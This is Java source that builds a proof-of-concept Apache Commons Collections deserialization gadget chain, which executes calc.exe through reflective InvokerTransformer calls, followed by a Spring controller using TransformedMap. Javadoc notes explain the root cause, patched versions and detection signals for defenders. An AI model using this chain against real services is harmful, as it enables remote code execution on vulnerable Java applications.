/**
 * Builds the proof-of-concept object for the Apache Commons Collections
 * {@code InvokerTransformer} gadget chain, wrapped in a JDK
 * {@code AnnotationInvocationHandler}.
 *
 * <p>This method only constructs the object graph. The entry is put into the
 * backing map before the map is decorated, so the transformer chain is not run
 * here. It runs only if something later writes an entry value through the
 * decorated map.
 *
 * <p>Review notes for defenders:
 * <ul>
 *   <li>The root cause is an application calling
 *       {@code ObjectInputStream.readObject()} on untrusted bytes while these
 *       functor classes are on the classpath. Avoid native deserialization of
 *       untrusted data, or restrict it with an allow-list
 *       {@code java.io.ObjectInputFilter}.</li>
 *   <li>Commons Collections 3.2.2 / 4.1 and later refuse to deserialize the
 *       unsafe functors by default. Newer JDKs have also changed the handler
 *       class (NOTE(review): confirm against the JDK actually in use).</li>
 *   <li>The class names {@code InvokerTransformer}, {@code ChainedTransformer}
 *       and {@code AnnotationInvocationHandler} appearing in an inbound
 *       serialized stream are a useful detection signal.</li>
 * </ul>
 *
 * @return the reflectively created handler instance holding the decorated map
 * @throws Exception if the handler class or constructor cannot be resolved,
 *         made accessible or instantiated
 */
public static Object Reverse_Payload() throws Exception {
    // Reflective equivalent of Runtime.getRuntime().exec("calc.exe"); the command is a harmless demo marker.
    final Transformer[] steps = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer(
            "getMethod",
            new Class[] {String.class, Class[].class},
            new Object[] {"getRuntime", new Class[0]}),
        new InvokerTransformer(
            "invoke",
            new Class[] {Object.class, Object[].class},
            new Object[] {null, new Object[0]}),
        new InvokerTransformer(
            "exec",
            new Class[] {String.class},
            new Object[] {"calc.exe"})
    };
    final Transformer chain = new ChainedTransformer(steps);

    // Populate first, decorate second: the value transformer only applies to later writes.
    final Map<String, String> backing = new HashMap<String, String>();
    backing.put("value", "value");
    final Map decorated = TransformedMap.decorate(backing, null, chain);

    // Look up the JDK-internal handler class by name via reflection.
    final Class<?> handlerType = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    // Fetch its (Class, Map) constructor via reflection.
    final Constructor<?> handlerCtor = handlerType.getDeclaredConstructor(Class.class, Map.class);
    // Access checks must be lifted first; the original author notes the PoC fails otherwise.
    handlerCtor.setAccessible(true);
    // Instantiate the handler with Retention as the annotation type and the decorated map as its member map.
    return handlerCtor.newInstance(Retention.class, decorated);
}
/**
 * Handles {@code GET /programs.htm}: exposes the known classes to the view as
 * the model attribute {@code "programmap"}.
 *
 * <p>Each {@code Meta} is inserted as both key and value into a decorated
 * {@code MultiValueMap}. The key transformer replaces the key with the result
 * of calling {@code getProgram} on it; the value transformer is a no-op.
 *
 * <p>Security note: {@code invokerTransformer} performs a reflective method call.
 * The method name here is a fixed literal and the keys come from
 * {@code executionService}; neither should ever be derived from request data.
 *
 * @param model the model that receives the {@code "programmap"} attribute
 * @return the view name {@code "programs"}
 */
@RequestMapping(value = "/programs.htm", method = RequestMethod.GET)
public String programs(final Model model) {
    final List<Meta> metas = executionService.getKnownClasses();

    // Key transformer: meta -> meta.getProgram() (reflective call); value transformer: no-op.
    final Map programMap =
        TransformedMap.decorate(
            new MultiValueMap(),
            TransformerUtils.invokerTransformer("getProgram"),
            TransformerUtils.nopTransformer());

    // put() passes the key through the key transformer; the underlying map is a MultiValueMap.
    for (final Meta entry : metas) {
        programMap.put(entry, entry);
    }

    model.addAttribute("programmap", programMap);
    return "programs";
}